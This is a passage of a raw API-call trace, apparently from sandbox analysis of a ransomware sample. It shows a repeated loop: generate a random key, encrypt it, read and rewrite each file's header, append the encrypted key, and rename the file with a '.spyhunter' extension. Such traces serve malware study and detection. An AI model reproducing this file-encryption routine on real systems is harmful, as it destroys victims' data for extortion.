0x2c150d8 [0096.553] wnsprintfW (in: pszDest=0x2c150d8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\msolap100.dll.spyhunter") returned 84 [0096.553] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\msolap100.dll" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\msolap100.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\msolap100.dll.spyhunter" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\msolap100.dll.spyhunter")) returned 1 [0096.628] GetProcessHeap () returned 0x2c0000 [0096.628] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c150d8 | out: hHeap=0x2c0000) returned 1 [0096.628] GetProcessHeap () returned 0x2c0000 [0096.628] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0096.628] GetProcessHeap () returned 0x2c0000 [0096.628] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x346488 | out: hHeap=0x2c0000) returned 1 [0096.628] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fbb0 | out: pbBuffer=0x57fbb0) returned 1 [0096.628] GetProcessHeap () returned 0x2c0000 [0096.628] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0096.628] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57fba8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57fba8*=0x30) returned 1 [0096.628] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\msmdlocal.dll" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\msmdlocal.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0096.629] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\msmdlocal.dll") returned 74 [0096.629] StrStrW (lpFirst="msmdlocal.dll", lpSrch=".txt") returned 0x0 [0096.629] GetProcessHeap () returned 0x2c0000 [0096.629] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c12890 [0096.629] ReadFile (in: hFile=0x170, lpBuffer=0x2c12890, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57fb6c, lpOverlapped=0x0 | out: lpBuffer=0x2c12890*, lpNumberOfBytesRead=0x57fb6c*=0x2800, lpOverlapped=0x0) returned 1 [0096.630] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0096.630] WriteFile (in: hFile=0x170, lpBuffer=0x2c12890*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57fb6c, lpOverlapped=0x0 | out: lpBuffer=0x2c12890*, lpNumberOfBytesWritten=0x57fb6c*=0x2800, lpOverlapped=0x0) returned 1 [0096.631] GetProcessHeap () returned 0x2c0000 [0096.631] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c12890 | out: hHeap=0x2c0000) returned 1 [0096.631] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0096.631] WriteFile (in: hFile=0x170, lpBuffer=0x57fbac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57fb6c, lpOverlapped=0x0 | out: lpBuffer=0x57fbac*, lpNumberOfBytesWritten=0x57fb6c*=0x4, lpOverlapped=0x0) returned 1 [0096.641] WriteFile (in: hFile=0x170, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57fb6c, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57fb6c*=0x30, lpOverlapped=0x0) returned 1 [0096.641] CloseHandle (hObject=0x170) returned 1 [0096.749] GetProcessHeap () returned 0x2c0000 [0096.749] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c12890 [0096.749] wnsprintfW (in: pszDest=0x2c12890, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\msmdlocal.dll.spyhunter") returned 84 [0096.750] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\msmdlocal.dll" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\msmdlocal.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\msmdlocal.dll.spyhunter" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\msmdlocal.dll.spyhunter")) returned 1 [0096.750] GetProcessHeap () returned 0x2c0000 [0096.750] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c12890 | out: hHeap=0x2c0000) returned 1 [0096.750] GetProcessHeap () returned 0x2c0000 [0096.750] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0096.750] GetProcessHeap () returned 0x2c0000 [0096.750] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3463a8 | out: hHeap=0x2c0000) returned 1 [0096.751] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fba8 | out: pbBuffer=0x57fba8) returned 1 [0096.751] GetProcessHeap () returned 0x2c0000 [0096.751] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0096.751] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57fba0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57fba0*=0x30) returned 1 [0096.751] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql70.xsl" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\sql70.xsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x174 [0096.905] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql70.xsl") returned 81 [0096.905] StrStrW (lpFirst="sql70.xsl", lpSrch=".txt") returned 0x0 [0096.905] GetProcessHeap () returned 0x2c0000 [0096.905] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c10048 [0096.905] ReadFile (in: hFile=0x174, lpBuffer=0x2c10048, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57fb64, lpOverlapped=0x0 | out: lpBuffer=0x2c10048*, lpNumberOfBytesRead=0x57fb64*=0x2800, lpOverlapped=0x0) returned 1 [0096.962] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0096.962] WriteFile (in: hFile=0x174, lpBuffer=0x2c10048*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57fb64, lpOverlapped=0x0 | out: lpBuffer=0x2c10048*, lpNumberOfBytesWritten=0x57fb64*=0x2800, lpOverlapped=0x0) returned 1 [0096.963] GetProcessHeap () returned 0x2c0000 [0096.963] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c10048 | out: hHeap=0x2c0000) returned 1 [0096.963] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0096.963] WriteFile (in: hFile=0x174, lpBuffer=0x57fba4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57fb64, lpOverlapped=0x0 | out: lpBuffer=0x57fba4*, lpNumberOfBytesWritten=0x57fb64*=0x4, lpOverlapped=0x0) returned 1 [0096.972] WriteFile (in: hFile=0x174, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57fb64, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57fb64*=0x30, lpOverlapped=0x0) returned 1 [0096.972] CloseHandle (hObject=0x174) returned 1 [0096.972] GetProcessHeap () returned 0x2c0000 [0096.973] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c10048 [0096.973] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql70.xsl.spyhunter") returned 91 [0096.973] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql70.xsl" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\sql70.xsl"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql70.xsl.spyhunter" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\sql70.xsl.spyhunter")) returned 1 [0096.973] GetProcessHeap () returned 0x2c0000 [0096.973] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c10048 | out: hHeap=0x2c0000) returned 1 [0096.973] GetProcessHeap () returned 0x2c0000 [0096.973] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0096.973] GetProcessHeap () returned 0x2c0000 [0096.973] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34e9c8 | out: hHeap=0x2c0000) returned 1 [0096.973] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fba8 | out: pbBuffer=0x57fba8) returned 1 [0096.973] GetProcessHeap () returned 0x2c0000 [0096.973] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0096.973] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57fba0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57fba0*=0x30) returned 1 [0096.974] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04267_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04267_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x16c [0097.079] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04267_.WMF") returned 67 [0097.079] StrStrW (lpFirst="AN04267_.WMF", lpSrch=".txt") returned 0x0 [0097.079] GetProcessHeap () returned 0x2c0000 [0097.079] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c170d8 [0097.080] ReadFile (in: hFile=0x16c, lpBuffer=0x2c170d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57fb64, lpOverlapped=0x0 | out: lpBuffer=0x2c170d8*, lpNumberOfBytesRead=0x57fb64*=0x1e7c, lpOverlapped=0x0) returned 1 [0097.104] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0xffffe184, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0097.104] WriteFile (in: hFile=0x16c, lpBuffer=0x2c170d8*, nNumberOfBytesToWrite=0x1e7c, lpNumberOfBytesWritten=0x57fb64, lpOverlapped=0x0 | out: lpBuffer=0x2c170d8*, lpNumberOfBytesWritten=0x57fb64*=0x1e7c, lpOverlapped=0x0) returned 1 [0097.104] GetProcessHeap () returned 0x2c0000 [0097.104] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c170d8 | out: hHeap=0x2c0000) returned 1 [0097.104] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0097.104] WriteFile (in: hFile=0x16c, lpBuffer=0x57fba4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57fb64, lpOverlapped=0x0 | out: lpBuffer=0x57fba4*, lpNumberOfBytesWritten=0x57fb64*=0x4, lpOverlapped=0x0) returned 1 [0097.104] WriteFile (in: hFile=0x16c, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57fb64, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57fb64*=0x30, lpOverlapped=0x0) returned 1 [0097.104] CloseHandle (hObject=0x16c) returned 1 [0097.104] GetProcessHeap () returned 0x2c0000 [0097.105] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c1e168 [0097.105] wnsprintfW (in: pszDest=0x2c1e168, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04267_.WMF.spyhunter") returned 77 [0097.105] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04267_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04267_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04267_.WMF.spyhunter" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04267_.wmf.spyhunter")) returned 1 [0097.106] GetProcessHeap () returned 0x2c0000 [0097.106] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c1e168 | out: hHeap=0x2c0000) returned 1 [0097.106] GetProcessHeap () returned 0x2c0000 [0097.106] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0097.106] GetProcessHeap () returned 0x2c0000 [0097.106] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34b0b0 | out: hHeap=0x2c0000) returned 1 [0097.106] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fba0 | out: pbBuffer=0x57fba0) returned 1 [0097.106] GetProcessHeap () returned 0x2c0000 [0097.106] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0097.106] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57fb98*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57fb98*=0x30) returned 1 [0097.106] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00438_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00438_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x174 [0097.629] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00438_.WMF") returned 67 [0097.629] StrStrW (lpFirst="BS00438_.WMF", lpSrch=".txt") returned 0x0 [0097.629] GetProcessHeap () returned 0x2c0000 [0097.629] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c16890 [0097.629] ReadFile (in: hFile=0x174, lpBuffer=0x2c16890, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57fb5c, lpOverlapped=0x0 | out: lpBuffer=0x2c16890*, lpNumberOfBytesRead=0x57fb5c*=0x4bc, lpOverlapped=0x0) returned 1 [0097.788] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0xfffffb44, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0097.788] WriteFile (in: hFile=0x174, lpBuffer=0x2c16890*, nNumberOfBytesToWrite=0x4bc, lpNumberOfBytesWritten=0x57fb5c, lpOverlapped=0x0 | out: lpBuffer=0x2c16890*, lpNumberOfBytesWritten=0x57fb5c*=0x4bc, lpOverlapped=0x0) returned 1 [0097.788] GetProcessHeap () returned 0x2c0000 [0097.788] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c16890 | out: hHeap=0x2c0000) returned 1 [0097.788] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0097.788] WriteFile (in: hFile=0x174, lpBuffer=0x57fb9c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57fb5c, lpOverlapped=0x0 | out: lpBuffer=0x57fb9c*, lpNumberOfBytesWritten=0x57fb5c*=0x4, lpOverlapped=0x0) returned 1 [0097.788] WriteFile (in: hFile=0x174, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57fb5c, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57fb5c*=0x30, lpOverlapped=0x0) returned 1 [0097.789] CloseHandle (hObject=0x174) returned 1 [0097.789] GetProcessHeap () returned 0x2c0000 [0097.789] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x3867e8 [0097.789] wnsprintfW (in: pszDest=0x3867e8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00438_.WMF.spyhunter") returned 77 [0097.789] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00438_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00438_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00438_.WMF.spyhunter" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00438_.wmf.spyhunter")) returned 1 [0097.789] GetProcessHeap () returned 0x2c0000 [0097.790] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3867e8 | out: hHeap=0x2c0000) returned 1 [0097.790] GetProcessHeap () returned 0x2c0000 [0097.790] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0097.790] GetProcessHeap () returned 0x2c0000 [0097.790] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c1c320 | out: hHeap=0x2c0000) returned 1 [0097.790] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fba0 | out: pbBuffer=0x57fba0) returned 1 [0097.790] GetProcessHeap () returned 0x2c0000 [0097.790] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0097.790] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57fb98*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57fb98*=0x30) returned 1 [0097.790] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00084_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00084_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0097.824] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00084_.WMF") returned 67 [0097.824] StrStrW (lpFirst="HH00084_.WMF", lpSrch=".txt") returned 0x0 [0097.824] GetProcessHeap () returned 0x2c0000 [0097.824] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c16890 [0097.824] ReadFile (in: hFile=0x170, lpBuffer=0x2c16890, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57fb5c, lpOverlapped=0x0 | out: lpBuffer=0x2c16890*, lpNumberOfBytesRead=0x57fb5c*=0x9a8, lpOverlapped=0x0) returned 1 [0097.896] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xfffff658, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0097.897] WriteFile (in: hFile=0x170, lpBuffer=0x2c16890*, nNumberOfBytesToWrite=0x9a8, lpNumberOfBytesWritten=0x57fb5c, lpOverlapped=0x0 | out: lpBuffer=0x2c16890*, lpNumberOfBytesWritten=0x57fb5c*=0x9a8, lpOverlapped=0x0) returned 1 [0097.897] GetProcessHeap () returned 0x2c0000 [0097.897] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c16890 | out: hHeap=0x2c0000) returned 1 [0097.897] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0097.897] WriteFile (in: hFile=0x170, lpBuffer=0x57fb9c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57fb5c, lpOverlapped=0x0 | out: lpBuffer=0x57fb9c*, lpNumberOfBytesWritten=0x57fb5c*=0x4, lpOverlapped=0x0) returned 1 [0097.897] WriteFile (in: hFile=0x170, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57fb5c, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57fb5c*=0x30, lpOverlapped=0x0) returned 1 [0097.897] CloseHandle (hObject=0x170) returned 1 [0097.909] GetProcessHeap () returned 0x2c0000 [0097.909] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x38c7a8 [0097.909] wnsprintfW (in: pszDest=0x38c7a8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00084_.WMF.spyhunter") returned 77 [0097.909] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00084_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00084_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00084_.WMF.spyhunter" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00084_.wmf.spyhunter")) returned 1 [0098.059] GetProcessHeap () returned 0x2c0000 [0098.059] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x38c7a8 | out: hHeap=0x2c0000) returned 1 [0098.059] GetProcessHeap () returned 0x2c0000 [0098.059] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0098.059] GetProcessHeap () returned 0x2c0000 [0098.059] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c1af00 | out: hHeap=0x2c0000) returned 1 [0098.060] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fb98 | out: pbBuffer=0x57fb98) returned 1 [0098.060] GetProcessHeap () returned 0x2c0000 [0098.060] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0098.060] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57fb90*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57fb90*=0x30) returned 1 [0098.060] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099149.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099149.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x174 [0098.073] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099149.WMF") returned 67 [0098.073] StrStrW (lpFirst="J0099149.WMF", lpSrch=".txt") returned 0x0 [0098.073] GetProcessHeap () returned 0x2c0000 [0098.073] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c301b0 [0098.073] ReadFile (in: hFile=0x174, lpBuffer=0x2c301b0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57fb54, lpOverlapped=0x0 | out: lpBuffer=0x2c301b0*, lpNumberOfBytesRead=0x57fb54*=0x2800, lpOverlapped=0x0) returned 1 [0098.111] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0098.111] WriteFile (in: hFile=0x174, lpBuffer=0x2c301b0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57fb54, lpOverlapped=0x0 | out: lpBuffer=0x2c301b0*, lpNumberOfBytesWritten=0x57fb54*=0x2800, lpOverlapped=0x0) returned 1 [0098.111] GetProcessHeap () returned 0x2c0000 [0098.111] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c301b0 | out: hHeap=0x2c0000) returned 1 [0098.111] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0098.111] WriteFile (in: hFile=0x174, lpBuffer=0x57fb94*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57fb54, lpOverlapped=0x0 | out: lpBuffer=0x57fb94*, lpNumberOfBytesWritten=0x57fb54*=0x4, lpOverlapped=0x0) returned 1 [0098.125] WriteFile (in: hFile=0x174, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57fb54, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57fb54*=0x30, lpOverlapped=0x0) returned 1 [0098.125] CloseHandle (hObject=0x174) returned 1 [0098.125] GetProcessHeap () returned 0x2c0000 [0098.125] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x390fd8 [0098.125] wnsprintfW (in: pszDest=0x390fd8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099149.WMF.spyhunter") returned 77 [0098.125] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099149.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099149.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099149.WMF.spyhunter" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099149.wmf.spyhunter")) returned 1 [0098.126] GetProcessHeap () returned 0x2c0000 [0098.126] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x390fd8 | out: hHeap=0x2c0000) returned 1 [0098.126] GetProcessHeap () returned 0x2c0000 [0098.126] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0098.126] GetProcessHeap () returned 0x2c0000 [0098.126] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x38ad58 | out: hHeap=0x2c0000) returned 1 [0098.126] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fb98 | out: pbBuffer=0x57fb98) returned 1 [0098.126] GetProcessHeap () returned 0x2c0000 [0098.126] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0098.126] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57fb90*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57fb90*=0x30) returned 1 [0098.126] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099182.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099182.wmf"), dwDesiredAccess=0xc0000000, 